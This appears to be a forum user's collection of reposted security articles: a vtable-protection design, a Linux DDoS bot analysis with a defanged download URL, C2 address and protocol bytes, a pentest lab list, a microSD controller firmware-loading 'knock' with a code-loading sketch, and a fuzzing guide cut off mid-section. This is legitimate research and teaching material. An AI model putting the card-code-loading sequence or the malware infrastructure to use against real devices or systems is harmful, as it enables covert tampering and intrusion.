Everything posted by Nytro
-
vtable protections: fast and thorough?

Recently, there's been a reasonable amount of activity in the vtable protection space. Most of it is compiler-based. For example, there's the GCC-based virtual table verification, a.k.a. VTV. There are also multiple experiments based on clang/LLVM, and of course MSVC's vtguard. In the non-compiler space, there's Blink's heap partitioning, enabled by PartitionAlloc.

It seems, though, that these various techniques require the user to choose between "fast" and "thorough" protection. This isn't ideal. Shortly, I'll document my own idea for how to try and get both fast and thorough. But first, a recap on what we mean by fast and thorough.

Fast vtable protection

Protecting vtables typically involves inserting machine instructions around vtable pointer loads or virtual calls. Going fast is simple: only insert a very small number of fast instructions (i.e. no hard-to-predict branches). This is the approach taken by vtguard. If you look at page 14 in the vtguard PDF linked above, you'll see that there's just a single cmp and a single jne (short, and never taken in normal execution) added to the hot path.

Tangentially, another task commonly undertaken when adding vtable protections to a given program is to remove as many virtual calls as possible, by annotating classes and methods with the "final" keyword and/or applying whole-program optimizations.

Thorough vtable protection

Describing what we want in a thorough vtable protection is a little more involved. We want:

- Defeating ASLR does not defeat the vtable check. (vtguard lacks this property, whereas the GCC implementation has it.)
- Only a valid vtable pointer can be used.
- Furthermore, only a vtable pointer corresponding to the correct hierarchy for the call site can be used.
- Ideally, only a vtable pointer corresponding to the correct hierarchy level for the call site can be used.

A fast solution for thorough vtable protection?

How can we get all of the protections above and get them fast? My idea revolves around separating the problem into two pieces:

1. Work out whether we can trust the vtable pointer or not.
2. Validate that the class type represented by the vtable pointer is appropriate for the call site.

To trust or not to trust?

Current schemes trust the vtable pointer or not based either on some secret (vtguard, the xor-based LLVM approach), a fixed table of valid values (GCC, some LLVM approaches) or by constraining values that might appear in the vtable position (heap partitioning).

The new scheme would be to reserve a certain portion of the address space for vtables. We know that nothing else can be mapped there, so by suitably masking any proposed vtable pointer, we know it is valid. I haven't fully thought this through for 32-bit, but look at this 64-bit variant:

- Host vtables in the lower 4GB of address space.
- Use the dereference of a 32-bit register to load the vtable entry. This provides masking for free and even saves a byte in the instruction sequence. It works because loading 4 bytes into a 64-bit register zero-extends the result.
- Optionally, save memory by having the compiler use 4-byte vtables.

This scheme is approximately free, maybe even performance-positive in some situations. Furthermore, one possible implementation is to stop somewhere around here for a very fast protection scheme that is "ok" in thoroughness. On the downside, you've lost the 64-bit invariant that "nothing is mapped in the bottom 4GB", but the percentage of space used is going to be small.
If that bothers us, then we can use the same trick to load a 4-byte vtable pointer and then "or" it with 0x100000000 (use bts if you dare) or some other value.

Validating class type

Once you know you trust your vtable pointer, validating the class type becomes a lot simpler. Instead of messing with secrets inside the vtable, you can just store a compact representation of the class type inside the vtable, with the aim of satisfying validation needs with a single compare. The one trick we want to play is to make it easy to validate various different positions in a class hierarchy with minimal work. To do this, we can store class details in a hierarchical format. To take a simple case, imagine that we have the following classes in the system:

A1, A1:B1, A2, A2:B1, A2:B1:C1

We encode these using one byte per hierarchy level, the basemost class being the LSB:

00000001, 00000101, 00000002, 00000102, 00010102

(Note that this will be an approximation. For example, if you have more than 256 basemost classes with virtual functions, you would need to represent the first level with 2 or more bytes.)

Finally, our "is this object of the correct type for the call site?" check becomes a simple compare. Depending on the position in the hierarchy, we may be able to achieve the compare with no masking and therefore a single instruction. For example, for a call site expecting an object of type A1, it's just "cmpb $1, (%eax)". That's a 4-byte sequence, which is much shorter than the 10-byte sequence noted in the vtguard PDF. For a call site expecting an object of type A2:B1, it's "cmpw $0x102, (%eax)". A sketch of this encoding scheme follows below.

Closing notes

Will it work well? Who knows. I haven't had time to implement this, nor am I likely to in the near future. Feel free to take this and run with it.

Note that this idea doesn't cover what to do with raw function pointer calls. If you want to head towards complete control flow integrity, you'll want to look at protecting those, as well as return addresses (the current canary-based stack defenses do nothing against an arbitrary read/write primitive).

Posted by Chris at 5:11 PM

Sursa: Security: vtable protections: fast and thorough?
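To make the encoding concrete, here is a minimal Python sketch of the hierarchical class-ID scheme described in the post. The class names and byte layout come from the post's own example; the emitted machine code would be the cmpb/cmpw compares shown above, and this merely models the logic:

[code]
# Hierarchical class-type IDs, one byte per hierarchy level,
# basemost class in the least significant byte (per the post).
CLASS_IDS = {
    "A1":       0x00000001,
    "A1:B1":    0x00000101,
    "A2":       0x00000002,
    "A2:B1":    0x00000102,
    "A2:B1:C1": 0x00010102,
}

def call_site_check(object_id: int, expected: str) -> bool:
    """Model the single-compare check: match the low N bytes,
    where N is the expected type's depth in the hierarchy.

    A call site expecting A1 compares 1 byte (cmpb $1, (%eax));
    one expecting A2:B1 compares 2 bytes (cmpw $0x102, (%eax)).
    """
    levels = expected.count(":") + 1
    mask = (1 << (8 * levels)) - 1
    return (object_id & mask) == CLASS_IDS[expected]

# A derived object passes the checks for every level above it...
assert call_site_check(CLASS_IDS["A2:B1:C1"], "A2")
assert call_site_check(CLASS_IDS["A2:B1:C1"], "A2:B1")
# ...but an object from an unrelated hierarchy does not.
assert not call_site_check(CLASS_IDS["A1:B1"], "A2")
[/code]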
-
Another look at a cross-platform DDoS botnet

I learned from a recent "Malware Must Die" post about a Linux malware sample that is associated with DNS amplification attacks. As mentioned in the MMD post, several researchers have posted on this, or similar, malware. Since I'm particularly interested in Linux malware, especially if it has a DDoS component, I thought I'd also take a look. I was able to get the malware to execute on my Linux sandbox and connect to the C&C. While I've yet to see any DDoS-related activity, I did pcap the C2 comms and snap an image for Volatility analysis. Links to the pcap and memory image can be found at the bottom of this post.

The malware was downloaded from hxxp://198.2[.]192.204:22/disknyp. The MD5 hash value of the sample I obtained is 260533ebd353c3075c9dddf7784e86f9. The C2 is located at 190.115.20.27:59870.

Referencing the supplied pcap, the compromised host connected to the C2 at 18:46 EST. Upon connection to the C2, the compromised host sends information about the current Linux kernel, in this case "Linux 2.6.32-33-generic-pae".

[Image: bot sending kernel info to C2]

It's interesting to note that the bot's C2 communication is via a persistent connection. Unlike typical HTTP bot check-in traffic, this bot maintains a connection to the remote host on port 59870. Since this is all one huge session, if you attempt "Follow TCP stream" in Wireshark, it will take a bit of time to present the output. The C2 then sends 4 bytes, "0x04 0x00 0x00 0x00", upon which the bot sends back 27 bytes of all 0x00. At 21:13, the C2 sends 75 bytes of hex:

[Image: initial 75 byte sequence from C2 to bot]

Approx. every thirty seconds, the C2 sends a new 75-byte sequence to the bot, for example:

01:00:00:00:43:00:00:00:00:fd:05:00:00:00:00:00:00:01:00:00:00:01:00:00:00:80:d4:07:c6:9c:50:00:01:00:00:00:00:00:00:00:1e:00:00:00:00:04:00:00:00:04:00:00:10:27:60:ea:ac:f5:a5:8f:ac:f5:a5:8f:00:00:00:00:00:d4:07:c6:9c:50:00
01:00:00:00:43:00:00:00:00:fe:05:00:00:00:00:00:00:01:00:00:00:01:00:00:00:80:d4:07:c7:d4:50:00:01:00:00:00:00:00:00:00:1e:00:00:00:00:04:00:00:00:04:00:00:10:27:60:ea:ac:f5:a5:8f:ac:f5:a5:8f:00:00:00:00:00:d4:07:c7:d4:50:00
01:00:00:00:43:00:00:00:00:ff:05:00:00:00:00:00:00:01:00:00:00:01:00:00:00:80:d4:07:c6:9b:50:00:01:00:00:00:00:00:00:00:1e:00:00:00:00:04:00:00:00:04:00:00:10:27:60:ea:ac:f5:a5:8f:ac:f5:a5:8f:00:00:00:00:00:d4:07:c6:9b:50:00

Byte offset decimal 09 appears to be a counter, incrementing by one on each sequence from the C2. The contents at decimal offsets 28 and 71 initially vary between 0xC6 and 0xC7.
This continues until 22:06 EST, when the pattern changes and varied values are seen:

01:00:00:00:43:00:00:00:00:1d:06:00:00:00:00:00:00:01:00:00:00:01:00:00:00:80:73:ee:ed:f5:58:1b:01:00:00:00:00:00:00:00:0c:00:00:00:00:04:00:00:00:04:00:00:10:27:60:ea:ac:f5:a5:8f:ac:f5:a5:8f:00:00:00:00:00:73:ee:ed:f5:58:1b
01:00:00:00:43:00:00:00:00:1e:06:00:00:00:00:00:00:01:00:00:00:01:00:00:00:80:7a:e0:22:c7:58:1b:01:00:00:00:00:00:00:00:0c:00:00:00:00:04:00:00:00:04:00:00:10:27:60:ea:ac:f5:a5:8f:ac:f5:a5:8f:00:00:00:00:00:7a:e0:22:c7:58:1b
01:00:00:00:43:00:00:00:00:1f:06:00:00:00:00:00:00:01:00:00:00:01:00:00:00:80:0e:11:5f:4a:58:1b:01:00:00:00:00:00:00:00:0c:00:00:00:00:04:00:00:00:04:00:00:10:27:60:ea:ac:f5:a5:8f:ac:f5:a5:8f:00:00:00:00:00:0e:11:5f:4a:58:1b
01:00:00:00:43:00:00:00:00:20:06:00:00:00:00:00:00:01:00:00:00:01:00:00:00:80:3d:84:e6:15:5b:1b:01:00:00:00:00:00:00:00:0c:00:00:00:00:04:00:00:00:04:00:00:10:27:60:ea:ac:f5:a5:8f:ac:f5:a5:8f:00:00:00:00:00:3d:84:e6:15:5b:1b

The bot again replies with a 27-byte sequence; however, decimal offset 19 now has a value that varies between 0 and 2:

00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:01:00:00:00:00:00:00:00
00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:02:00:00:00:00:00:00:00
00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00

Volatility

Some basic Volatility analysis of the memory image yields the following:

linux_pslist

[Image: linux_pslist]

The 'disknyp' process started at 23:45 UTC with PID 1241. It ran with user privileges, and no child processes were noted.

linux_lsof -p 1241

[Image: linux_lsof for PID 1241]

Process 'disknyp', PID 1241, has /dev/null open as well as socket:[6931].

linux_proc_maps

[Image: linux_proc_maps for PID 1241]

Note that /tmp/disknyp is the path where 'disknyp' was originally executed. Dumping the two segments at '/usr/tmp' produces two files, 'task.1241.0x8048000.vma' and 'task.1241.0x8168000.vma'. Running 'file' on the segments shows:

task.1241.0x8048000.vma: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped

Dumping strings for that segment shows:

[Image: section of 'strings' output for PID 1241 segment 0x8048000]

We note the string "fake.cfg" that was mentioned in other posts related to this malware. Attempting to find the file in the original /tmp directory:

[Image: linux_find_file for 'fake.cfg']

linux_yarascan

Let's use the 'yarascan' plugin to see if there are any other references to 'fake.cfg' in this image.
[Image: searching for other references to 'fake.cfg' using the linux_yarascan plugin]

We see that the string 'fake.cfg' is only found in PID 1241, 'disknyp'. Again using the 'linux_find_file' plugin, we can dump the contents of 'fake.cfg' located at inode 0xed9dc088.

[Image: contents of 'fake.cfg']

Final Thoughts

This appears to be some proof-of-concept or "testing" malware. There are several aspects of this sample that make me wonder if it was just put out there to see how quickly it would be detected and analyzed:

- Analysis of the original file as downloaded from hxxp://198.2[.]192.204:22/disknyp shows that it is statically linked and not stripped.
- The C2 communications are somewhat noisy. Maintaining a persistent connection with check-ins every few seconds is not very stealthy.
- No attempt is made to hide the process. In hours of running this, I didn't see any child processes or variance in the process on the local host.
- 'fake.cfg' is created in the malware's working directory. 'fake.cfg', really?

As I mentioned earlier in the post, I have yet to see any DoS-related traffic from this sample. I'm also not aware of DoS activity being seen by other researchers. If anyone has learned otherwise, I'd love to hear from you!

Reference:

Packet capture of initial malware download and execution - disknyp.pcap, 4.1 MB - MD5 hash: 4fb44dfa3d98e17f13c6befd55787582
Memory image of Ubuntu Server infected with 'disknyp' - linux_disknyp.zip, 167 MB - MD5 hash of unzipped .vmem: 04831ad2fbd089c2c5b7b8dc657d0e7a (Linux Volatility profile: LinuxUbuntu1004_pae32-33x86)

Posted by Andre M. DiMino at 4:36 PM

Sursa: Andre' M. DiMino - SemperSecurus: Another look at a cross-platform DDoS botnet
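A small Python sketch, based only on the observations above, that pulls the apparent counter byte (decimal offset 9) and the two varying bytes (offsets 28 and 71) out of the 75-byte C2 sequences. The hex string is copied from the capture above; the field names are my own labels, not anything from the malware:

[code]
def parse_c2(hex_string: str) -> dict:
    """Parse one 75-byte C2 message as observed in the pcap.

    Offset 9 appears to be a one-byte counter that increments with
    each message; offsets 28 and 71 initially vary between 0xC6/0xC7.
    """
    data = bytes.fromhex(hex_string.replace(":", ""))
    assert len(data) == 75, "expected a 75-byte C2 message"
    return {
        "counter": data[9],
        "offset_28": data[28],
        "offset_71": data[71],
    }

# First sequence from the capture above.
msg = ("01:00:00:00:43:00:00:00:00:fd:05:00:00:00:00:00:00:01:00:"
       "00:00:01:00:00:00:80:d4:07:c6:9c:50:00:01:00:00:00:00:00:"
       "00:00:1e:00:00:00:00:04:00:00:00:04:00:00:10:27:60:ea:ac:"
       "f5:a5:8f:ac:f5:a5:8f:00:00:00:00:00:d4:07:c6:9c:50:00")
print(parse_c2(msg))  # counter = 0xfd, offsets 28/71 = 0xc6
[/code]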
-
[h=1]PENETRATION TESTING PRACTICE LAB - VULNERABLE APPS / SYSTEMS[/h]

The following table gives the URLs of all the vulnerable web applications, operating system installations, old software and war games [hacking] sites. The URLs for individual applications that are part of other collection entities are not given, as it is not necessary to download and manually configure each of them if they are already available in a configured state. For the technologies used in each web application, please refer to the mindmap on the linked page.

http://www.amanhardikar.com/mindmaps/PracticeUrls.html
-
On Hacking MicroSD Cards

Today at the Chaos Computer Congress (30C3), xobs and I disclosed a finding that some SD cards contain vulnerabilities that allow arbitrary code execution — on the memory card itself. On the dark side, code execution on the memory card enables a class of MITM (man-in-the-middle) attacks, where the card seems to be behaving one way, but in fact it does something else. On the light side, it also enables the possibility for hardware enthusiasts to gain access to a very cheap and ubiquitous source of microcontrollers.

In order to explain the hack, it’s necessary to understand the structure of an SD card. The information here applies to the whole family of “managed flash” devices, including microSD, SD, MMC as well as the eMMC and iNAND devices typically soldered onto the mainboards of smartphones and used to store the OS and other private user data. We also note that similar classes of vulnerabilities exist in related devices, such as USB flash drives and SSDs.

Flash memory is really cheap. So cheap, in fact, that it’s too good to be true. In reality, all flash memory is riddled with defects — without exception. The illusion of a contiguous, reliable storage media is crafted through sophisticated error correction and bad block management functions. This is the result of a constant arms race between the engineers and mother nature; with every fabrication process shrink, memory becomes cheaper but more unreliable. Likewise, with every generation, the engineers come up with more sophisticated and complicated algorithms to compensate for mother nature’s propensity for entropy and randomness at the atomic scale.

These algorithms are too complicated and too device-specific to be run at the application or OS level, and so it turns out that every flash memory disk ships with a reasonably powerful microcontroller to run a custom set of disk abstraction algorithms. Even the diminutive microSD card contains not one, but at least two chips — a controller, and at least one flash chip (high density cards will stack multiple flash die). You can see some die shots of the inside of microSD cards at a microSD teardown I did a couple years ago.

In our experience, the quality of the flash chip(s) integrated into memory cards varies widely. It can be anything from high-grade factory-new silicon to material with over 80% bad sectors. Those concerned about e-waste may (or may not) be pleased to know that it’s also common for vendors to use recycled flash chips salvaged from discarded parts. Larger vendors will tend to offer more consistent quality, but even the largest players staunchly reserve the right to mix and match flash chips with different controllers, yet sell the assembly as the same part number — a nightmare if you’re dealing with implementation-specific bugs.

The embedded microcontroller is typically a heavily modified 8051 or ARM CPU. In modern implementations, the microcontroller will approach 100 MHz performance levels, and also have several hardware accelerators on-die. Amazingly, the cost of adding these controllers to the device is probably on the order of $0.15-$0.30, particularly for companies that can fab both the flash memory and the controllers within the same business unit. It’s probably cheaper to add these microcontrollers than to thoroughly test and characterize each flash memory chip, which explains why managed flash devices can be cheaper per bit than raw flash chips, despite the inclusion of a microcontroller.
The downside of all this complexity is that there can be bugs in the hardware abstraction layer, especially since every flash implementation has unique algorithmic requirements, leading to an explosion in the number of hardware abstraction layers that a microcontroller has to potentially handle. The inevitable firmware bugs are now a reality of the flash memory business, and as a result it’s not feasible, particularly for third party controllers, to indelibly burn a static body of code into on-chip ROM.

The crux is that a firmware loading and update mechanism is virtually mandatory, especially for third-party controllers. End users are rarely exposed to this process, since it all happens in the factory, but this doesn’t make the mechanism any less real. In my explorations of the electronics markets in China, I’ve seen shop keepers burning firmware on cards that “expand” the capacity of the card — in other words, they load a firmware that reports the capacity of a card is much larger than the actual available storage. The fact that this is possible at the point of sale means that most likely, the update mechanism is not secured.

In our talk at 30C3, we report our findings exploring a particular microcontroller brand, namely, Appotech and its AX211 and AX215 offerings. We discover a simple “knock” sequence transmitted over manufacturer-reserved commands (namely, CMD63 followed by ‘A’,‘P’,‘P’,‘O’) that drops the controller into a firmware loading mode. At this point, the card will accept the next 512 bytes and run it as code. From this beachhead, we were able to reverse engineer (via a combination of code analysis and fuzzing) most of the 8051's function-specific registers, enabling us to develop novel applications for the controller, without any access to the manufacturer’s proprietary documentation. Most of this work was done using our open source hardware platform, Novena, and a set of custom flex circuit adapter cards (which, tangentially, led toward the development of flexible circuit stickers aka chibitronics).

Significantly, the SD command processing is done via a set of interrupt-driven callbacks processed by the microcontroller. These callbacks are an ideal location to implement an MITM attack.

It’s as yet unclear how many other manufacturers leave their firmware updating sequences unsecured. Appotech is a relatively minor player in the SD controller world; there’s a handful of companies that you’ve probably never heard of that produce SD controllers, including Alcor Micro, Skymedi, Phison, SMI, and of course Sandisk and Samsung. Each of them would have different mechanisms and methods for loading and updating their firmwares. However, it’s been previously noted that at least one Samsung eMMC implementation using an ARM instruction set had a bug which required a firmware updater to be pushed to Android devices, indicating yet another potentially promising venue for further discovery.

From the security perspective, our findings indicate that even though memory cards look inert, they run a body of code that can be modified to perform a class of MITM attacks that could be difficult to detect; there is no standard protocol or method to inspect and attest to the contents of the code running on the memory card’s microcontroller. Those in high-risk, high-sensitivity situations should assume that a “secure-erase” of a card is insufficient to guarantee the complete erasure of sensitive data.
Therefore, it’s recommended to dispose of memory cards through total physical destruction (e.g., grind it up with a mortar and pestle).

From the DIY and hacker perspective, our findings indicate a potentially interesting source of cheap and powerful microcontrollers for use in simple projects. An Arduino, with its 8-bit 16 MHz microcontroller, will set you back around $20. A microSD card with several gigabytes of memory and a microcontroller with several times the performance could be purchased for a fraction of the price. While SD cards are admittedly I/O-limited, some clever hacking of the microcontroller in an SD card could make for a very economical and compact data logging solution for I2C or SPI-based sensors.

Slides from our talk at 30C3 can be downloaded here, or you can watch the talk on Youtube below.

Team Kosagi would like to extend a special thanks to .mudge for enabling this research through the Cyber Fast Track program.

Tags: flash, hacking, microcontroller, microsd, mitm

Sursa: On Hacking MicroSD Cards
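For illustration only, a Python sketch of the "knock" described in the post. The `send_cmd` and `send_data` callables are hypothetical hooks standing in for whatever SD host interface you drive the card with (the real work in the talk was done on custom hardware), and the exact framing of the knock is not spelled out in the post:

[code]
# Hypothetical sketch: send_cmd()/send_data() are placeholders for
# an SD host controller interface; they are NOT a real library API.
KNOCK_CMD = 63          # manufacturer-reserved CMD63
KNOCK_BYTES = b"APPO"   # the 'A','P','P','O' knock from the talk

def load_firmware(send_cmd, send_data, code: bytes) -> None:
    """Drop an AX211/AX215 into firmware-loading mode, then push code.

    Per the post, after the knock the card accepts the next 512 bytes
    and runs them as code on its embedded 8051.
    """
    if len(code) != 512:
        raise ValueError("the controller runs exactly 512 bytes")
    send_cmd(KNOCK_CMD, KNOCK_BYTES)  # CMD63 followed by 'A','P','P','O'
    send_data(code)                   # executed as code on the card
[/code]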
-
15 minute guide to fuzzing

Matt Hillman, August 08, 2013

Have you heard about fuzzing but are not sure what it is or if you should do it? This guide should quickly get you up to speed on what it’s all about.

What is fuzzing?

Fuzzing is a way of discovering bugs in software by providing randomised inputs to programs to find test cases that cause a crash. Fuzzing your programs can give you a quick view on their overall robustness and help you find and fix critical bugs.

Fuzzing is ultimately a black box technique, requiring no access to source code, but it can still be used against software for which you do have source code, because it will potentially find bugs more quickly and avoid the need to review lots of code. Once a crash is detected, if you have the source code, it should become much easier to fix.

Pros and cons of fuzzing

Fuzzing can be very useful, but it is no silver bullet. Here are some of the pros and cons of fuzzing:

Pros:
- Can provide results with little effort: once a fuzzer is up and running, it can be left for hours, days or months to look for bugs with no interaction
- Can reveal bugs that were missed in a manual audit
- Provides an overall picture of the robustness of the target software

Cons:
- Will not find all bugs: fuzzing may miss bugs that do not trigger a full program crash, and may be less likely to trigger bugs that are only triggered in highly specific circumstances
- The crashing test cases that are produced may be difficult to analyse, as the act of fuzzing does not give you much knowledge of how the software operates internally
- Programs with complex inputs can require much more work to produce a smart enough fuzzer to get sufficient code coverage

Smart and dumb fuzzing

Fuzzers provide random input to software. This may be in the form of a network protocol, a file of a certain format or direct user input. The fuzzed input can be completely random with no knowledge of what the expected input should look like, or it can be created to look like valid input with some alterations.

A fuzzer that generates completely random input is known as a “dumb” fuzzer, as it has no built-in intelligence about the program it is fuzzing. A dumb fuzzer requires the smallest amount of work to produce (it could be as simplistic as piping /dev/random into a program). This small amount of work can produce results for very little cost – one of fuzzing’s big advantages.

However, sometimes a program will only perform certain processing if particular aspects of the input are present. For example, a program may accept a “name” field in its input, and this field may have a “name length” associated with it. If these fields are not present in a form that is valid enough for the program to identify, it may never attempt to read the name. However, if these fields are present in a valid form, but the length value is set to the incorrect value, the program may read beyond the buffer containing the name and trigger a crash. Without input that is at least partly valid, this is very unlikely to happen.

In these cases, “smart” fuzzers can be used. These are programmed with knowledge of the input format (i.e. a protocol definition or rules for a file format). The fuzzer can then construct mostly valid input and only fuzz parts of the input within that basic format. The greater the level of intelligence you build into a fuzzer, the deeper you may be able to go into a protocol or file format’s processing, but the more work you create for yourself. A balance needs to be found between these two extremes.
It can be good to begin with a much more dumb fuzzer and increase its intelligence as the code quality of the software you are testing increases. If you get lots of crashes with a simplistic fuzzer, there is no point spending a long time making it more intelligent until the code quality increases to a point where the code requires it.

Types of fuzzer

Broadly speaking, fuzzers can be split into two categories based on how they create input to programs – mutation-based and generation-based. This section details those categories as well as offering a brief description of a more advanced technique called evolutionary fuzzing.

Mutation

Mutation-based fuzzers are arguably one of the easier types of fuzzer to create. This technique suits dumb fuzzing but can be used with more intelligent fuzzers as well. With mutation, samples of valid input are mutated randomly to produce malformed input.

A dumb mutation fuzzer can simply select a valid sample input and alter parts of it randomly. For many programs, this can provide a surprising amount of mileage, as inputs are still often similar enough to a valid input that good code coverage can be achieved without the need for further intelligence.

You can build in greater intelligence by allowing the fuzzer to do some level of parsing of the samples to ensure that it only modifies specific parts or that it does not break the overall structure of the input such that it is immediately rejected by the program. Some protocols or file formats will incorporate checksums that will fail if they are modified arbitrarily. A mutation-based fuzzer should usually fix these checksums so that the input is accepted for processing, or the only code that will be tested is the checksum validation and nothing else.

Two useful techniques that can be used by mutation-based fuzzers are described below.

Replay

A fuzzer can take saved sample inputs and simply replay them after mutating them. This works well for file format fuzzing, where a number of sample files can be saved and fuzzed to provide to the target program. Simple or stateless network protocols can also be fuzzed effectively with replay, as the fuzzer will not need to make lots of legitimate requests to get deep into the protocol. For a more complex protocol, replay may be more difficult, as the fuzzer may need to respond in a dynamic way to the program to allow processing to continue deep into the protocol, or the protocol may simply be inherently non-replayable.

Man-in-the-Middle or Proxy

You may have heard of Man-in-the-Middle (MITM) as a technique used by penetration testers and hackers, but it can also be used for mutation-based network protocol fuzzing. MITM describes the situation where you place yourself in the middle of a client and server (or two clients in the case of peer-to-peer networking), intercepting and possibly modifying messages passed between them. In this way, you are acting like a proxy between the two. The term MITM is generally used when it is not expected that you will be acting like a proxy, but for our purposes the terms are largely interchangeable.

By setting your fuzzer up as a proxy, it can mutate requests or responses depending on whether you are fuzzing the server or the client. Again, the fuzzer could have no intelligence about the protocol and simply randomly alter some requests and not others, or it could intelligently target requests at the specific level of the protocol in which you are interested.
Proxy-based fuzzing can allow you to take an existing deployment of a networked program and quickly insert a fuzzing layer into it, without needing to make your fuzzer act like a client or server itself.

Generation

Generation-based fuzzers actually generate input from scratch rather than mutating existing input. Generation-based fuzzers usually require some level of intelligence in order to construct input that makes at least some sense to the program, although generating completely random data would also technically be generation.

Generation fuzzers often split a protocol or file format into chunks, which they can build up in a valid order, and randomly fuzz some of those chunks independently. This can create inputs that preserve their overall structure but contain inconsistent data within that structure. The granularity of these chunks and the intelligence with which they are constructed define the level of intelligence of the fuzzer.

While mutation-based fuzzing can have a similar effect as generation fuzzing (as, over time, mutations will be randomly applied without completely breaking the input’s structure), generating inputs ensures that this will be so. Generation fuzzing can also get deeper into a protocol more easily, as it can construct valid sequences of inputs, applying fuzzing to specific parts of that communication. It also allows the fuzzer to act as a true client/server, generating correct, dynamic responses where these cannot be blindly replayed.

Evolutionary

Evolutionary fuzzing is an advanced technique, which we will only briefly describe here. It allows the fuzzer to use feedback from each test case to learn over time the format of the input. For example, by measuring the code coverage of each test case, the fuzzer can heuristically work out which properties of the test case exercise a given area of code, and it can gradually evolve a set of test cases that cover the majority of the program code. Evolutionary fuzzing often relies on techniques similar to genetic algorithms and may require some form of binary instrumentation to operate correctly.

What are you really fuzzing?

Even for relatively dumb fuzzers, it is important to keep in mind what part of the code your test cases are actually likely to hit. To give a simple example, if you are fuzzing an application protocol that uses TCP/IP and your fuzzer randomly mutates a raw packet capture, you are likely to be corrupting the TCP/IP packets themselves, and your input is unlikely to get processed by the application at all. Or, if you were testing an OCR program that parsed images of text into real text, but you were mutating the whole of an image file, you could end up testing its image parsing code more often than the actual OCR code. If you wanted to target that OCR processing specifically, you might wish to keep the headers of the image file valid.

Likewise, you may be generating input that is so random that it does not pass an initial sanity check in the program, or the code contains a checksum that you do not correct. You are then only testing that first branch in the program, never getting deeper into the program code.
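Tying the mutation and sanity-check points together, here is a minimal dumb mutation fuzzer in Python. The file names, header size and mutation ratio are illustrative, not from the guide:

[code]
import random

def mutate(sample: bytes, skip: int = 0, ratio: float = 0.01) -> bytes:
    """Dumb mutation: randomly overwrite ~ratio of the bytes.

    `skip` preserves a leading header so the mutated input still
    passes the program's initial sanity checks (see above).
    """
    data = bytearray(sample)
    for _ in range(max(1, int(len(data) * ratio))):
        data[random.randrange(skip, len(data))] = random.randrange(256)
    return bytes(data)

# Illustrative usage: keep the first 8 header bytes of a sample intact.
sample = open("sample.png", "rb").read()   # hypothetical sample file
testcase = mutate(sample, skip=8)
open("testcase.png", "wb").write(testcase)
[/code]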
Anatomy of a fuzzer

To operate effectively, a fuzzer needs to perform a number of important tasks:

- Generate test cases
- Record test cases or any information needed to reproduce them
- Interface with the target program to provide test cases as input
- Detect crashes

Fuzzers often split many of these tasks out into separate modules, for example having one library that can mutate data or generate it based on a definition, and another to provide test cases to the target program, and so on. Below are some notes on each of these tasks.

Test case generation

Generating test cases will vary depending on whether mutation-based or generation-based fuzzing is being employed. With either, there will be something that needs randomly transforming, whether it is a field of a particular type or an arbitrary chunk of data. These transformations can be completely random, but it is worth remembering that edge and corner cases can often be the source of bugs in programs. As such, you may wish to favour such cases and include values such as:

- Very long or completely blank strings
- Maximum and minimum values for integers on the platform
- Values like -1, 0, 1 and 2

Depending on what you are fuzzing, there may be specific values or characters that are more likely to trigger bugs. For example:

- Null characters
- New line characters
- Semi-colons
- Format string values (%n, %s, etc.)
- Application-specific keywords

Reproducibility

The simplest way to reproduce a test case is to record the exact input used when a crash is detected. However, there are other ways to ensure reproducibility that can be more convenient in certain circumstances. One way to do this is to store the initial seed used for the random component of test case generation, and ensure that all subsequent random behaviour follows a path that can be traced back to that seed. By re-running the fuzzer with the same seed, the behaviour should be reproducible. For example, you may record only the test case number and the initial seed and then quickly re-execute generation with that seed until you reach the given test case; a sketch of this follows below.

This technique can be useful when the target program may accumulate dependencies based on past inputs. Previous inputs may have caused the program to initialise various items in its memory that are required to be present to trigger the bug. In these situations, simply recording the crashing test case would not be sufficient to reproduce the bug.

Interfacing with the target

Interfacing with the target program to provide the fuzzed input is often straightforward. For network protocols, it may simply involve sending the test case over the network or responding to a client request; for file formats, it may simply mean executing the program with a command line argument pointing to the test case. However, sometimes the input is provided in a form that is not trivial to generate in an automated way, or scripting the program to execute each test case has a high overhead and proves to be very slow.

Creative thinking in these cases can reveal ways to exercise the relevant piece of code with the right data. For example, this may be performed by instrumenting a program in memory to artificially execute a parsing function with the input provided as an argument entirely in memory. This can remove the need for the program to go through a lengthy loading procedure before each test case, and further speed increases can be obtained by having test cases generated and provided completely in memory rather than going via the hard drive.
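As promised above, a small sketch of the seed-based reproducibility idea: record only the seed and test case number, and regenerate the exact case on demand. All names and the per-case mutation count are illustrative:

[code]
import random

def generate_case(seed: int, case_number: int, sample: bytes) -> bytes:
    """Deterministically regenerate test case `case_number` for `seed`.

    All randomness flows from one seeded RNG, so (seed, case_number)
    is enough to reproduce any test case, including whatever state the
    target accumulated from the cases that came before it.
    """
    rng = random.Random(seed)
    case = b""
    for _ in range(case_number + 1):
        data = bytearray(sample)
        for _ in range(8):  # a few random byte overwrites per case
            data[rng.randrange(len(data))] = rng.randrange(256)
        case = bytes(data)
    return case

# The 1000th case of run 42 is always the same bytes:
assert generate_case(42, 1000, b"A" * 64) == generate_case(42, 1000, b"A" * 64)
[/code]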
Crash detection

Crash detection is critical for fuzzing. If you cannot accurately determine when a program has crashed, you will not be able to identify a test case as triggering a bug. There are a number of common ways to approach this:

Attach a debugger. This will provide you with the most accurate results, and you can script the debugger to provide you with a crash trace as soon as a crash is detected. However, having a debugger attached can slow programs significantly, and this can cause quite an overhead. The fewer test cases you can generate in a given period of time, the fewer chances you have of finding a crash.

See if the process disappears. Rather than attaching a debugger, you can simply see if the process ID of the target still exists on the system after executing the test case. If the process has disappeared, it probably crashed. You can re-run the test case in a debugger later if you want some more information about the crash, and you can even do this automatically for each crash, while still avoiding the slowdown of having the debugger attached for every case.

Timeout. If the program normally responds to your test cases, you can set a timeout after which you assume the program has either crashed or frozen. This can also detect bugs that cause the program to become unresponsive but not necessarily to terminate.

Whichever method you use, the program should be restarted whenever it crashes or becomes unresponsive, in order to allow fuzzing to continue.

Fuzzing quality

